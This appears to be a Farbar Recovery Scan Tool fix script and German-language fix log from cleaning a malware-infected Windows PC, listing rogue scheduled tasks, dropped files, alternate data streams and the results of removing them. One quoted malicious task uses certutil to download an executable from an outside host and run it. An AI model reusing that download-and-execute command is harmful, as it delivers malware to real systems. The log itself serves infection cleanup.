2018-05-27 09:47 - 2018-05-27 11:41 - 000003082 __RSH C:\ProgramData\ntuser.pol
2018-05-27 09:47 - 2018-05-27 10:22 - 000016718 _____ C:\Windows\System32\Tasks\Social Software
2018-05-27 09:47 - 2018-05-27 09:47 - 002032128 ___SH (Apple Inc.) C:\ProgramData\Iostream.exe
2018-05-27 09:47 - 2018-05-27 09:47 - 000043520 _____ C:\Users\Nico\AppData\Local\pfialx.dll
2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_OT
2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_FG
2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_AM
2018-05-27 09:47 - 2018-05-27 09:47 - 000004468 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ
2018-05-27 09:47 - 2018-05-27 09:47 - 000004444 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_NM
2018-05-27 09:47 - 2018-05-27 09:47 - 000000000 ____D C:\Users\Public\Documents\XMUpdate
2018-05-27 09:47 - 2018-05-27 09:47 - 000000000 ____D C:\Program Files\Common Files\5ZNAWZD2EL69
2018-05-27 08:56 - 2018-05-27 08:56 - 000001285 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HowToRemove.lnk
2018-05-27 08:56 - 2018-05-27 08:56 - 000000000 ____D C:\Users\Nico\AppData\LocalLow\AMD
2018-05-26 14:03 - 2018-05-26 14:03 - 001592320 _____ C:\Windows\2045f4764aa9c27a5e23cd56fa5420a8.exe
2018-05-26 14:03 - 2018-05-26 14:03 - 000039584 _____ C:\Windows\uninstaller.dat
2018-05-25 12:23 - 2018-05-25 12:23 - 000000000 ___HD C:\Windows\msdownld.tmp
2018-05-27 09:47 - 2018-05-27 09:47 - 002032128 ___SH (Apple Inc.) C:\ProgramData\Iostream.exe
2018-05-25 01:01 - 2018-05-25 01:01 - 000000184 ____H () C:\Program Files (x86)\Common Files\new.bat
2018-05-27 10:47 - 2018-05-27 10:47 - 007611392 _____ () C:\Users\Nico\AppData\Local\agent.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000070896 _____ () C:\Users\Nico\AppData\Local\Config.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 002136576 _____ (TODO: <Company name>) C:\Users\Nico\AppData\Local\Hottam.exe
2018-05-27 10:47 - 2018-05-27 10:47 - 001987748 _____ () C:\Users\Nico\AppData\Local\Hottam.tst
2018-05-27 10:47 - 2018-05-27 10:53 - 000016080 _____ () C:\Users\Nico\AppData\Local\InstallationConfiguration.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000140800 _____ () C:\Users\Nico\AppData\Local\installer.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 001895382 _____ () C:\Users\Nico\AppData\Local\Jaytip.bin
2018-05-27 10:47 - 2018-05-27 10:47 - 000018432 _____ () C:\Users\Nico\AppData\Local\Main.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000005568 _____ () C:\Users\Nico\AppData\Local\md.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000126464 _____ () C:\Users\Nico\AppData\Local\noah.dat
2018-05-27 09:47 - 2018-05-27 09:47 - 000043520 _____ () C:\Users\Nico\AppData\Local\pfialx.dll
2018-02-05 20:57 - 2018-05-27 13:14 - 000007654 _____ () C:\Users\Nico\AppData\Local\Resmon.ResmonCfg
2018-05-27 10:47 - 2018-05-27 11:12 - 000929792 _____ () C:\Users\Nico\AppData\Local\sham.db
2018-05-27 10:47 - 2018-05-27 10:47 - 000032038 _____ () C:\Users\Nico\AppData\Local\uninstall_temp.ico
2018-05-27 10:47 - 2018-05-27 10:47 - 000278510 _____ () C:\Users\Nico\AppData\Local\VoltFinlab.bin
ShellIconOverlayIdentifiers: [{BFD98515-CD74-48A4-98E2-13D209E3EE4F}] -> {BFD98515-CD74-48A4-98E2-13D209E3EE4F} => C:\Windows\system32\mcicda64.dll [2018-03-24] ()
C:\Windows\system32\mcicda64.dll
Task: {099A856C-08D3-43C8-AD18-3D651763C816} - System32\Tasks\Social Software => C:\Windows\system32\rundll32.exe "C:\Program Files\Social Software\Social Software.dll",UjaAssDjw <==== ACHTUNG
C:\Program Files\Social Software
Task: {1622AF7B-53DD-4FEE-8BE9-907C9F57AA98} - System32\Tasks\SystemUpdate64 => C:\Program Files\SystemaRev\RevServicesX\SystemUpdate64.exe [2018-05-27] (SystemaRev)
C:\Program Files\SystemaRev
Task: {1913E8F8-F8A7-47F0-A2D5-DF77C0226E3E} - System32\Tasks\GoogleUpdateSecurityTaskMachine_FG => C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d
Task: {28FB99D2-B4C3-4FD4-8949-3C860CE2DE24} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-05-27] () <==== ACHTUNG
Task: {412B9FDA-8C4C-40F4-A23C-696805866F9C} - System32\Tasks\AncillaryFunctionauf => C:\Program Files (x86)\nodejs\node.exe
C:\Program Files (x86)\nodejs
Task: {42767FB3-1423-4F1B-8F31-8B5936FA8F06} - System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ => C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22
Task: {478261E4-F178-4CD8-8575-B8ACE5A0769E} - System32\Tasks\GoogleUpdateSecurityTaskMachine_AM => C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7
Task: {6372E416-89E4-46ED-A9C3-6F1F6F797A15} - System32\Tasks\GoogleUpdateSecurityTaskMachine_NM => C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9
Task: {66E7FCFF-AEE1-4593-AF28-7B81A60E82D7} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/app/4/app.exe C:\Users\Nico\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Nico\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ACHTUNG
Task: {6E7DD5F8-0819-4296-8B92-EEA20358E2F3} - System32\Tasks\MainPMgr => powershell -ExecutionPolicy ByPass -File pm.ps1
Task: {AB4D74FB-B89A-4A74-982B-76AE532F4F7F} - System32\Tasks\GoogleUpdateSecurityTaskMachine_OT => C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78
Task: {BAD80BEE-7129-4A3C-B9FA-580ED44A6159} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe <==== ACHTUNG
C:\Program Files\Reimage
Task: {C6FD6CF5-A7E5-4DC3-A8A0-17D3A10CD175} - System32\Tasks\WindowsRecoveryCleaner => C:\ProgramData\Iostream.exe [2018-05-27] (Apple Inc.) <==== ACHTUNG
C:\ProgramData\Iostream.exe
ShortcutWithArgument: C:\Users\Nico\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
AlternateDataStreams: C:\ProgramData:NT [40]
AlternateDataStreams: C:\ProgramData:NT2 [552]
AlternateDataStreams: C:\Users\All Users:NT [40]
AlternateDataStreams: C:\Users\All Users:NT2 [552]
AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT [40]
AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT2 [552]
AlternateDataStreams: C:\ProgramData\Application Data:NT [40]
AlternateDataStreams: C:\ProgramData\Application Data:NT2 [552]
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT [40]
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2 [552]
AlternateDataStreams: C:\Users\Nico\Anwendungsdaten:NT [40]
AlternateDataStreams: C:\Users\Nico\Anwendungsdaten:NT2 [552]
AlternateDataStreams: C:\Users\Nico\AppData\Roaming:NT [40]
AlternateDataStreams: C:\Users\Nico\AppData\Roaming:NT2 [552]
AlternateDataStreams: C:\Users\Public\AppData:CSM [472]
Unlock: C:\Windows\system32\Drivers\etc\hosts
C:\Windows\system32\Drivers\etc\hosts
Hosts:
VirusTotal: C:\Windows\system32\ntkrnlmp.exe
VirusTotal: C:\Windows\system32\osloader.exe
VirusTotal: C:\ProgramData\Microsoft\Windows\Audio\winamgr.exe
CMD: dir "%ProgramFiles%"
CMD: dir "%ProgramFiles(x86)%"
CMD: dir "%ProgramData%"
CMD: dir "%Appdata%"
CMD: dir "%LocalAppdata%"
CMD: dir "%CommonProgramFiles(x86)%"
CMD: dir "%CommonProgramW6432%"
CMD: dir "%UserProfile%"
CMD: dir "C:\"
ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
RemoveProxy:
CMD: ipconfig /flushdns
cmd: netsh winsock reset catalog
cmd: netsh advfirewall reset
cmd: netsh advfirewall set allprofiles state ON
cmd: Bitsadmin /Reset /Allusers
EmptyTemp:

*****************

"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\JServicesManager" => erfolgreich entfernt
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\JServicesManager" => erfolgreich entfernt
"C:\Program Files\SystemaRev" => nicht gefunden
WNetworkMgmt => Dienst nicht gefunden.
"C:\ProgramData\Microsoft\Windows\WNetworkMgmt" => nicht gefunden
"HKLM\System\CurrentControlSet\Services\FairplayKD" => erfolgreich entfernt
FairplayKD => Dienst erfolgreich entfernt
"HKLM\System\CurrentControlSet\Services\Synth3dVsc" => erfolgreich entfernt
Synth3dVsc => Dienst erfolgreich entfernt
"HKLM\System\CurrentControlSet\Services\tsusbhub" => erfolgreich entfernt
tsusbhub => Dienst erfolgreich entfernt
"HKLM\System\CurrentControlSet\Services\VGPU" => erfolgreich entfernt
VGPU => Dienst erfolgreich entfernt
Winmon => Dienst nicht gefunden.
WinmonFS => Dienst nicht gefunden.
WinmonProcessMonitor => Dienst nicht gefunden.
"C:\Windows\System32\drivers\WinmonProcessMonitor.sys" => nicht gefunden
"C:\Windows\System32\drivers\WinmonFS.sys" => nicht gefunden
"C:\Windows\System32\drivers\Winmon.sys" => nicht gefunden
"C:\Windows\System32\Tasks\MainPMgr" => nicht gefunden
"C:\Windows\System32\Tasks\SystemUpdate64" => nicht gefunden
"C:\Program Files\SystemaRev" => nicht gefunden
C:\Windows\ntbtlog.txt => erfolgreich verschoben
"C:\ProgramData\SystemaRev" => nicht gefunden
"C:\Windows\System32\Tasks\ReimageUpdater" => nicht gefunden
"C:\Windows\Reimage.ini" => nicht gefunden
"C:\Users\Nico\AppData\Roaming\ParetoLogic" => nicht gefunden
"C:\Windows\SysWOW64\SSL" => nicht gefunden
"C:\Users\Nico\AppData\Local\sham.db" => nicht gefunden
"C:\Users\Nico\AppData\Local\InstallationConfiguration.xml" => nicht gefunden
"C:\Users\Nico\AppData\Local\agent.dat" => nicht gefunden
"C:\Users\Nico\AppData\Local\Hottam.exe" => nicht gefunden
"C:\Users\Nico\AppData\Local\Hottam.tst" => nicht gefunden
"C:\Users\Nico\AppData\Local\Jaytip.bin" => nicht gefunden
"C:\Windows\qcusolizqbhuglpw.qcus" => nicht gefunden
"C:\Users\Nico\AppData\Local\VoltFinlab.bin" => nicht gefunden
C:\Users\Nico\AppData\Local\installer.dat => erfolgreich verschoben
"C:\Users\Nico\AppData\Local\noah.dat" => nicht gefunden
"C:\Users\Nico\AppData\Local\Config.xml" => nicht gefunden
"C:\Users\Nico\AppData\Local\Main.dat" => nicht gefunden
"C:\Windows\SysWOW64\findit.xml" => nicht gefunden
"C:\Users\Nico\AppData\Local\md.xml" => nicht gefunden
"C:\ProgramData\Logic Cramble" => nicht gefunden
C:\Users\Nico\ntuser.pol => erfolgreich verschoben
"C:\Users\Nico\AppData\Roaming\FastDataX" => nicht gefunden
"C:\Users\Nico\AppData\Local\XService" => nicht gefunden
C:\Users\Nico\AppData\Local\Package Cache => erfolgreich verschoben
"C:\Users\Nico\AppData\Roaming\EpicNet Inc" => nicht gefunden
"C:\Windows\System32\Tasks\ScheduledUpdate" => nicht gefunden
"C:\Windows\System32\Tasks\csrss" => nicht gefunden
"C:\Windows\system32\Drivers\WinmonProcessMonitor.sys" => nicht gefunden
C:\Windows\System32\Tasks\AncillaryFunctionauf => erfolgreich verschoben
"C:\Users\Nico\AppData\Local\betterworld" => nicht gefunden
"C:\Windows\system32\mcicda64.dll" => nicht gefunden
"C:\Windows\System32\Tasks\WindowsRecoveryCleaner" => nicht gefunden
C:\Users\Public\Documents\{DE764086-1C0A-4DD3-90BA-0B93BDD794BE} => erfolgreich verschoben
C:\ProgramData\ntuser.pol => erfolgreich verschoben
C:\Windows\System32\Tasks\Social Software => erfolgreich verschoben
"C:\ProgramData\Iostream.exe" => nicht gefunden
"C:\Users\Nico\AppData\Local\pfialx.dll" => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_OT" => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_FG" => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_AM" => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ" => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_NM" => nicht gefunden
"C:\Users\Public\Documents\XMUpdate" => nicht gefunden
"C:\Program Files\Common Files\5ZNAWZD2EL69" => nicht gefunden
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HowToRemove.lnk => erfolgreich verschoben
C:\Users\Nico\AppData\LocalLow\AMD => erfolgreich verschoben
"C:\Windows\2045f4764aa9c27a5e23cd56fa5420a8.exe" => nicht gefunden
C:\Windows\uninstaller.dat => erfolgreich verschoben
C:\Windows\msdownld.tmp => erfolgreich verschoben
"C:\ProgramData\Iostream.exe" => nicht gefunden
"C:\Program Files (x86)\Common Files\new.bat" => nicht gefunden
"C:\Users\Nico\AppData\Local\agent.dat" => nicht gefunden
"C:\Users\Nico\AppData\Local\Config.xml" => nicht gefunden
"C:\Users\Nico\AppData\Local\Hottam.exe" => nicht gefunden
"C:\Users\Nico\AppData\Local\Hottam.tst" => nicht gefunden
"C:\Users\Nico\AppData\Local\InstallationConfiguration.xml" => nicht gefunden
"C:\Users\Nico\AppData\Local\installer.dat" => nicht gefunden
"C:\Users\Nico\AppData\Local\Jaytip.bin" => nicht gefunden
"C:\Users\Nico\AppData\Local\Main.dat" => nicht gefunden
"C:\Users\Nico\AppData\Local\md.xml" => nicht gefunden
"C:\Users\Nico\AppData\Local\noah.dat" => nicht gefunden
"C:\Users\Nico\AppData\Local\pfialx.dll" => nicht gefunden
"C:\Users\Nico\AppData\Local\Resmon.ResmonCfg" => nicht gefunden
"C:\Users\Nico\AppData\Local\sham.db" => nicht gefunden
"C:\Users\Nico\AppData\Local\uninstall_temp.ico" => nicht gefunden
"C:\Users\Nico\AppData\Local\VoltFinlab.bin" => nicht gefunden
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\{BFD98515-CD74-48A4-98E2-13D209E3EE4F}" => erfolgreich entfernt
HKLM\Software\Classes\CLSID\{BFD98515-CD74-48A4-98E2-13D209E3EE4F} => nicht gefunden
"C:\Windows\system32\mcicda64.dll" => nicht gefunden
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{099A856C-08D3-43C8-AD18-3D651763C816}" => erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{099A856C-08D3-43C8-AD18-3D651763C816}" => erfolgreich entfernt
"C:\Windows\System32\Tasks\Social Software" => nicht gefunden
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Social Software" => erfolgreich entfernt
"C:\Program Files\Social Software" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1622AF7B-53DD-4FEE-8BE9-907C9F57AA98} => nicht gefunden
"C:\Windows\System32\Tasks\SystemUpdate64" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SystemUpdate64 => nicht gefunden
"C:\Program Files\SystemaRev" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1913E8F8-F8A7-47F0-A2D5-DF77C0226E3E} => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_FG" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateSecurityTaskMachine_FG => nicht gefunden
"C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{28FB99D2-B4C3-4FD4-8949-3C860CE2DE24} => nicht gefunden
"C:\Windows\System32\Tasks\csrss" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss => nicht gefunden
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{412B9FDA-8C4C-40F4-A23C-696805866F9C}" => erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{412B9FDA-8C4C-40F4-A23C-696805866F9C}" => erfolgreich entfernt
"C:\Windows\System32\Tasks\AncillaryFunctionauf" => nicht gefunden
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AncillaryFunctionauf" => erfolgreich entfernt
"C:\Program Files (x86)\nodejs" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{42767FB3-1423-4F1B-8F31-8B5936FA8F06} => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateSecurityTaskMachine_VJ => nicht gefunden
"C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{478261E4-F178-4CD8-8575-B8ACE5A0769E} => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_AM" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateSecurityTaskMachine_AM => nicht gefunden
"C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6372E416-89E4-46ED-A9C3-6F1F6F797A15} => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_NM" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateSecurityTaskMachine_NM => nicht gefunden
"C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9" => nicht gefunden
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{66E7FCFF-AEE1-4593-AF28-7B81A60E82D7}" => erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{66E7FCFF-AEE1-4593-AF28-7B81A60E82D7} => nicht gefunden
"C:\Windows\System32\Tasks\ScheduledUpdate" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6E7DD5F8-0819-4296-8B92-EEA20358E2F3} => nicht gefunden
"C:\Windows\System32\Tasks\MainPMgr" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MainPMgr => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AB4D74FB-B89A-4A74-982B-76AE532F4F7F} => nicht gefunden
"C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_OT" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateSecurityTaskMachine_OT => nicht gefunden
"C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78" => nicht gefunden
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{BAD80BEE-7129-4A3C-B9FA-580ED44A6159}" => erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BAD80BEE-7129-4A3C-B9FA-580ED44A6159} => nicht gefunden
"C:\Windows\System32\Tasks\ReimageUpdater" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ReimageUpdater => nicht gefunden
"C:\Program Files\Reimage" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C6FD6CF5-A7E5-4DC3-A8A0-17D3A10CD175} => nicht gefunden
"C:\Windows\System32\Tasks\WindowsRecoveryCleaner" => nicht gefunden
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WindowsRecoveryCleaner => nicht gefunden
"C:\ProgramData\Iostream.exe" => nicht gefunden
C:\Users\Nico\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk => Verknüpfung Eigenschaft erfolgreich entfernt
C:\ProgramData => ":NT" ADS erfolgreich entfernt
C:\ProgramData => ":NT2" ADS erfolgreich entfernt
"C:\Users\All Users" => ":NT" ADS nicht gefunden.
"C:\Users\All Users" => ":NT2" ADS nicht gefunden.
"C:\ProgramData\Anwendungsdaten" => ":NT" ADS nicht gefunden.
"C:\ProgramData\Anwendungsdaten" => ":NT2" ADS nicht gefunden.
"C:\ProgramData\Application Data" => ":NT" ADS nicht gefunden.
"C:\ProgramData\Application Data" => ":NT2" ADS nicht gefunden.
C:\ProgramData\MTA San Andreas All => ":NT" ADS erfolgreich entfernt
C:\ProgramData\MTA San Andreas All => ":NT2" ADS erfolgreich entfernt
C:\Users\Nico\Anwendungsdaten => ":NT" ADS erfolgreich entfernt
C:\Users\Nico\Anwendungsdaten => ":NT2" ADS erfolgreich entfernt
"C:\Users\Nico\AppData\Roaming" => ":NT" ADS nicht gefunden.
"C:\Users\Nico\AppData\Roaming" => ":NT2" ADS nicht gefunden.
C:\Users\Public\AppData => ":CSM" ADS erfolgreich entfernt
"C:\Windows\system32\Drivers\etc\hosts" => wurde entsperrt
C:\Windows\system32\Drivers\etc\hosts => erfolgreich verschoben
Hosts erfolgreich wiederhergestellt.
VirusTotal: C:\Windows\system32\ntkrnlmp.exe => https://www.virustotal.com/file/5e27f275cd06956184baf125169bf6ab99368a90d203a9b7ee9fe61119b7ea6f/analysis/1526925422/
VirusTotal: C:\Windows\system32\osloader.exe => https://www.virustotal.com/file/ee1810c3bec825b672a40bec7438486c5b344332e2a06b9cd79f7213aa7a578b/analysis/1527842028/
"VirusTotal: C:\ProgramData\Microsoft\Windows\Audio\winamgr.exe" => nicht gefunden

========= dir "%ProgramFiles%" =========

 Volume in Laufwerk C: hat keine Bezeichnung.
 Volumeseriennummer: CC81-12A3

 Verzeichnis von C:\Program Files

31.05.2018  16:22    <DIR>          .
31.05.2018  16:22    <DIR>          ..
02.01.2018  17:33    <DIR>          AMD
02.01.2018  17:15    <DIR>          ASUS
31.05.2018  14:13    <DIR>          Common Files
03.05.2018  05:14    <DIR>          DVD Maker
01.03.2018  13:58    <DIR>          Epic Games
02.01.2018  17:15    <DIR>          Intel
09.05.2018  03:16    <DIR>          Internet Explorer
02.01.2018  20:09    <DIR>          Logitech Gaming Software
31.05.2018  16:22    <DIR>          Malwarebytes
14.07.2009  09:46    <DIR>          Microsoft Games
27.05.2018  11:46    <DIR>          Mozilla Firefox
14.07.2009  07:32    <DIR>          MSBuild
02.01.2018  17:07    <DIR>          Realtek
14.07.2009  07:32    <DIR>          Reference Assemblies
08.05.2018  20:21    <DIR>          TeamSpeak 3 Client
03.05.2018  05:14    <DIR>          Windows Defender
02.01.2018  18:11    <DIR>          Windows Mail
03.05.2018  05:14    <DIR>          Windows Media Player
02.01.2018  16:16    <DIR>          Windows NT
02.01.2018  18:11    <DIR>          Windows Photo Viewer
02.01.2018  18:11    <DIR>          Windows Portable Devices
02.01.2018  18:11    <DIR>          Windows Sidebar
27.05.2018  09:43    <DIR>          WinRAR
              0 Datei(en),              0 Bytes
              25 Verzeichnis(se), 836.029.267.968 Bytes frei

========= Ende von CMD: =========


========= dir "%ProgramFiles(x86)%" =========

 Volume in Laufwerk C: hat keine Bezeichnung.
 Volumeseriennummer: CC81-12A3

 Verzeichnis von C:\Program Files (x86)

27.05.2018  15:37    <DIR>          .
27.05.2018  15:37    <DIR>          ..
25.04.2018  20:02    <DIR>          Adobe
02.01.2018  17:33    <DIR>          AMD
02.01.2018  17:05    <DIR>          ASUS
31.05.2018  14:13    <DIR>          Common Files
01.06.2018  10:01    <DIR>          Drakensang Online
01.03.2018  13:56    <DIR>          Epic Games
02.01.2018  17:15    <DIR>          Intel
27.05.2018  09:11    <DIR>          Internet Explorer
07.04.2018  18:40    <DIR>          KeePass Password Safe 2
02.01.2018  17:06    <DIR>          Microsoft.NET
27.05.2018  11:46    <DIR>          Mozilla Maintenance Service
14.07.2009  07:32    <DIR>          MSBuild
27.05.2018  09:21    <DIR>          MTA San Andreas 1.5
06.01.2018  04:24    <DIR>          obs-studio
27.05.2018  11:16    <DIR>          OkayFreedom
29.01.2018  16:59    <DIR>          OpenOffice 4
02.01.2018  17:06    <DIR>          Realtek
14.07.2009  07:32    <DIR>          Reference Assemblies
25.05.2018  12:20    <DIR>          Rockstar Games
31.05.2018  21:31    <DIR>          Steam
03.05.2018  05:14    <DIR>          Windows Defender
02.01.2018  18:11    <DIR>          Windows Mail
03.05.2018  05:14    <DIR>          Windows Media Player
14.07.2009  07:32    <DIR>          Windows NT
02.01.2018  18:11    <DIR>          Windows Photo Viewer
02.01.2018  18:11    <DIR>          Windows Portable Devices
02.01.2018  18:11    <DIR>          Windows Sidebar
17.05.2018  08:27    <DIR>          YaTQA
              0 Datei(en),              0 Bytes
              30 Verzeichnis(se), 836.029.149.184 Bytes frei

========= Ende von CMD: =========


========= dir "%ProgramData%" =========

 Volume in Laufwerk C: hat keine Bezeichnung.
 Volumeseriennummer: CC81-12A3

 Verzeichnis von C:\ProgramData

26.04.2018  08:13    <DIR>          Adobe
24.05.2018  18:04    <DIR>          Epic
27.05.2018  09:47    <DIR>          Intel
31.05.2018  14:04    <DIR>          Logishrd
31.05.2018  16:22    <DIR>          Malwarebytes
25.05.2018  12:24    <DIR>          MTA San Andreas All
02.01.2018  21:29    <DIR>          Riot Games
              0 Datei(en),              0 Bytes
              7 Verzeichnis(se), 836.000.247.808 Bytes frei

========= Ende von CMD: =========


========= dir "%Appdata%" =========

 Volume in Laufwerk C: hat keine Bezeichnung.
 Volumeseriennummer: CC81-12A3

 Verzeichnis von C:\Users\Nico\AppData\Roaming

31.05.2018  16:26    <DIR>          .
31.05.2018  16:26    <DIR>          ..
25.04.2018  20:02    <DIR>          Adobe
06.01.2018  04:28    <DIR>          AMD
10.01.2018  20:24    <DIR>          ATI
11.03.2018  01:39    <DIR>          Axolot Games
30.05.2018  09:53    <DIR>          DarkSoulsII
13.01.2018  16:31    <DIR>          DVDVideoSoft
02.01.2018  16:17    <DIR>          Identities
10.04.2018  11:45    <DIR>          KeePass
02.01.2018  20:06    <DIR>          Logitech
06.01.2018  04:33    <DIR>          Macromedia
02.01.2018  17:18    <DIR>          Mozilla
02.05.2018  09:39    <DIR>          obs-studio
29.01.2018  16:59    <DIR>          OpenOffice
31.05.2018  13:37    <DIR>          Spotify
01.06.2018  10:33    <DIR>          TS3Client
27.05.2018  09:43    <DIR>          WinRAR
17.05.2018  08:31    <DIR>          YaTQA
              0 Datei(en),              0 Bytes
              19 Verzeichnis(se), 836.000.182.272 Bytes frei

========= Ende von CMD: =========


========= dir "%LocalAppdata%" =========

 Volume in Laufwerk C: hat keine Bezeichnung.
 Volumeseriennummer: CC81-12A3

 Verzeichnis von C:\Users\Nico\AppData\Local

01.06.2018  10:33    <DIR>          .
01.06.2018  10:33    <DIR>          ..
27.05.2018  09:35    <DIR>          Adobe
